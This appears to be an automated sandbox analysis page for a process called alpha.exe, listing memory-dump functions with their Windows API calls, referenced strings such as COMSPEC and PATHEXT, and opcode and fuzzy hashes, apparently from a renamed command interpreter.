Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memmovewcsncmp
String ID: 0123456789
API String ID: 3879766669-2793719750
Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
Instruction ID: 10df1e832c7817e9546fc318997e6d7ad547e266b7b3cff96025bf3b8dd580f9
Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
Instruction Fuzzy Hash: 0141B222B18687C5EA258F26E4026BA62A4FF48BC4F485139DE4EB7794DE3CE445C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F99784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F997D0

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F998D7

Strings

Software\Classes, xrefs: 00007FF683F997C2

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
String ID: Software\Classes
API String ID: 2714550308-1656466771
Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
Instruction ID: 4c3538ae4a822e0aa75345bd041e62bedd7f25bf0e776a5b7c0bfb722f17e954
Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
Instruction Fuzzy Hash: 8641A322A19752C1EA00DF16D54603A63A5FF45BD0F99823DDE5DA77E1EF39E842C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9A0FC

Part of subcall function 00007FF683F7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D46E
Part of subcall function 00007FF683F7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF683F7D485
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D4EE
Part of subcall function 00007FF683F7D3F0: iswspace.MSVCRT ref: 00007FF683F7D54D
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D569
Part of subcall function 00007FF683F7D3F0: wcschr.MSVCRT ref: 00007FF683F7D58C

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9A1FB

Strings

Software\Classes, xrefs: 00007FF683F9A0EE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
String ID: Software\Classes
API String ID: 2714550308-1656466771
Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
Instruction ID: 6755c1828eeea43a5f735a7d7e380248eb30f326a07c1124de1cc7a57e500c5f
Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
Instruction Fuzzy Hash: 5D41A122A09B52C1EE04DF15D44643963B5FF89BD0F588239DE5DA77E1DE39E882C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF683F8C736
SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF683F8C7E0

Strings

- , xrefs: 00007FF683F8C7A6

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ConsoleTitle
String ID: -
API String ID: 3358957663-3695764949
Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
Instruction ID: 524a2434707bc379e18b41f186c1c7d158b1333ac1430afc4d3001ce4109c0fb
Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
Instruction Fuzzy Hash: B731B461A48782C5EA189B16A8460786AA4FF49B90F5D423DDE0EB7BD5DF3CE441C384

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF683F872D2
swscanf.MSVCRT ref: 00007FF683F8731F

Strings

:EOF, xrefs: 00007FF683F872E8

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
Instruction ID: cbc623abc47c83ffa41699422e94c2d88d9a54964fe7477987ae0b19aa040152
Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
Instruction Fuzzy Hash: 1F317031E58642C6FB58AB16A8422B872A0FF55B54F4C4139EA4DF7291DF2CE845C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F73BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 00007FF683F73C85

Strings

/-Y, xrefs: 00007FF683F9184D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmp
String ID: /-Y
API String ID: 1886669725-4274875248
Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
Instruction ID: 74705c711bd84bdb72389a14f8cbfeda458858b5be09c6a3f684f4a6e2d82e90
Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
Instruction Fuzzy Hash: C1216D66B086A5D1EE109F02A54217876E1BF44FC0F49903ADE89A7794DF3CE492D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

3, xrefs: 00007FF683F7B64D
3, xrefs: 00007FF683F7B685

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID:
String ID: 3$3
API String ID: 0-2538865259
Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
Instruction ID: 71e4be663c894caa773bebcb6b2ee3b3cd62f2d0301c8a03f4e68b7ff7368cab
Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
Instruction Fuzzy Hash: 560153B5D0E182CAF7698B60A8862747270BF45311F9C413EC50EBB5A1DF2C6885C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F806C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806D6
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806F0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F8074D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F80762

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
Instruction ID: 7de2c88d80bb2c37ddd12f829870f5f9c060ab368b8608bef4a1e47cfe49176a
Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
Instruction Fuzzy Hash: 20415B72A09642D6EB598F11E44217EB7A0FF85B80F9C8439DA4EA7794DF3CE440CB80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: alpha.exePID: 3152, Parent PID: 6724COMMON

Execution Graph

Execution Coverage:	5.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	945
Total number of Limit Nodes:	26

Executed Functions

Function 00007FF683F80A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

_wcsnicmp.MSVCRT ref: 00007FF683F80AFE
memset.MSVCRT ref: 00007FF683F80B37
wcschr.MSVCRT ref: 00007FF683F80B91
wcsrchr.MSVCRT ref: 00007FF683F80C14
wcsrchr.MSVCRT ref: 00007FF683F80D79
NeedCurrentDirectoryForExePathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-2-0 ref: 00007FF683F80D9A
wcsrchr.MSVCRT ref: 00007FF683F80FBB
wcschr.MSVCRT ref: 00007FF683F80FD8
wcschr.MSVCRT ref: 00007FF683F80FF3
_wcsicmp.MSVCRT ref: 00007FF683F81091
_wcsicmp.MSVCRT ref: 00007FF683F810B1
wcsrchr.MSVCRT ref: 00007FF683F81102
_wcsicmp.MSVCRT ref: 00007FF683F81124
_wcsicmp.MSVCRT ref: 00007FF683F81142
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F81169

Strings

.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF683F8DA38
COMSPEC, xrefs: 00007FF683F8D927
.BAT, xrefs: 00007FF683F81087, 00007FF683F81138
PATHEXT, xrefs: 00007FF683F80E6E
cmd , xrefs: 00007FF683F80AF4
.CMD, xrefs: 00007FF683F810A7, 00007FF683F8111A
PATH, xrefs: 00007FF683F811D3

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
API String ID: 3305344409-4288247545
Opcode ID: 08bac76f509f6fd3fc69dc4d9486e559aed501487721408e7d77705ceb207560
Instruction ID: 994a078cca9f29b7d49943c392b4fb95278953f0bb78e2b537fe373c41c4ee11
Opcode Fuzzy Hash: 08bac76f509f6fd3fc69dc4d9486e559aed501487721408e7d77705ceb207560
Instruction Fuzzy Hash: EC42D621A48682C6EF688B1298122B967A1FF85B94F4C463DED1EE77D5DF3CE445C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDA6
Part of subcall function 00007FF683F7CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF683F7B9A1,?,?,?,?,00007FF683F7D81A), ref: 00007FF683F7CDBD

wcschr.MSVCRT ref: 00007FF683F7AAB6
towlower.MSVCRT ref: 00007FF683F7AAD5
memset.MSVCRT ref: 00007FF683F7AC27
wcschr.MSVCRT ref: 00007FF683F7AC3C
wcschr.MSVCRT ref: 00007FF683F7AC60
wcsrchr.MSVCRT ref: 00007FF683F7AC9B
wcschr.MSVCRT ref: 00007FF683F7AD82
wcschr.MSVCRT ref: 00007FF683F7AD9D
wcschr.MSVCRT ref: 00007FF683F7ADB8
wcschr.MSVCRT ref: 00007FF683F7ADD3
wcschr.MSVCRT ref: 00007FF683F7ADEE
wcschr.MSVCRT ref: 00007FF683F7AE09
iswspace.MSVCRT ref: 00007FF683F7AE30

Strings

:, xrefs: 00007FF683F8BC26
:ON, xrefs: 00007FF683F8BD37
:, xrefs: 00007FF683F8BC86
OFF, xrefs: 00007FF683F8BC32, 00007FF683F8BC92, 00007FF683F8BD0A
:, xrefs: 00007FF683F8BCFE

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
String ID: :$:$:$:ON$OFF
API String ID: 4076514806-467788257
Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction ID: 7a056ccde8192de0fa25f23951cccdb4a4e03008a27ca091ef9c4330c67f61e0
Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
Instruction Fuzzy Hash: A122A321A09687C6EF589F2699162B966A1FF49B84F4D813DD90EE7794DF3CA840C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F851EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF683F85508: GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF683F76F97), ref: 00007FF683F8550C

GetLocaleInfoW.KERNELBASE ref: 00007FF683F85237
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85260
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F852AB
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F852F7
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85335
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85360
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85388
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F853B0
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F853D8
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85400
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85428
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85450
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F85478
GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF683F854A0
setlocale.MSVCRT ref: 00007FF683F854BD

Strings

dd/MM/yy, xrefs: 00007FF683F8EFA3
Sat, xrefs: 00007FF683F8F141
Mon, xrefs: 00007FF683F8EFF2
Fri, xrefs: 00007FF683F8F0FE
.OCP, xrefs: 00007FF683F854B4
Tue, xrefs: 00007FF683F8F035
Thu, xrefs: 00007FF683F8F0BB
Sun, xrefs: 00007FF683F8F184
MM/dd/yy, xrefs: 00007FF683F852D0
yy/MM/dd, xrefs: 00007FF683F8EF8D
Wed, xrefs: 00007FF683F8F078

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: InfoLocale$DefaultLangUsersetlocale
String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
API String ID: 2492766124-2236139042
Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction ID: 8fbd8cd9a5153966d78d7411a8054341a0e17c0460043496716ffd83710fb4be
Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
Instruction Fuzzy Hash: BAF15065B48742CAEF158F12E5122B966A5FF48B84F98413DCA0DB77A4EF3CE905C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F84224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328
threadprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84297
UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F842D7
memset.MSVCRT ref: 00007FF683F842FD
memset.MSVCRT ref: 00007FF683F84368
GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84380

Part of subcall function 00007FF683F83A90: wcsrchr.MSVCRT ref: 00007FF683F83ADF
Part of subcall function 00007FF683F83A90: _wcsnicmp.MSVCRT ref: 00007FF683F83B38

wcsrchr.MSVCRT ref: 00007FF683F843E6
lstrcmpW.KERNELBASE ref: 00007FF683F84401
CreateProcessW.KERNELBASE ref: 00007FF683F8447F
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F844AA
CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F845EE
_local_unwind.MSVCRT ref: 00007FF683F84644
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F847E1
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F84802
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8ECD4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F8ECF0
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF683F8ED12

Strings

\XCOPY.EXE, xrefs: 00007FF683F843F7
=ExitCodeAscii, xrefs: 00007FF683F8456B
%08X, xrefs: 00007FF683F8452C
h, xrefs: 00007FF683F8436D
%01C, xrefs: 00007FF683F847B1
=ExitCode, xrefs: 00007FF683F8454C
COPYCMD, xrefs: 00007FF683F8439C, 00007FF683F844B9

Memory Dump Source

Source File: 00000005.00000002.1653401363.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000005.00000002.1653377393.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653434339.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653454376.00007FF683FC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1653554365.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
API String ID: 388421343-2905461000
Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction ID: f7d4f13caf55a479f64812f019dcc03edeacdcb11d8d8a48dec91d7b9278c357
Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
